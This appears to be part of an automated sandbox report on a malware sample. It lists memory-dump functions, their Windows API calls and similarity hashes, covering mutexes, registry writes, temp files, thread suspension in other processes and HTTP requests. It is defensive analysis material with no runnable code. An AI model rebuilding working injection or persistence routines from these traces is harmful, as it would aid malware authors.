    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
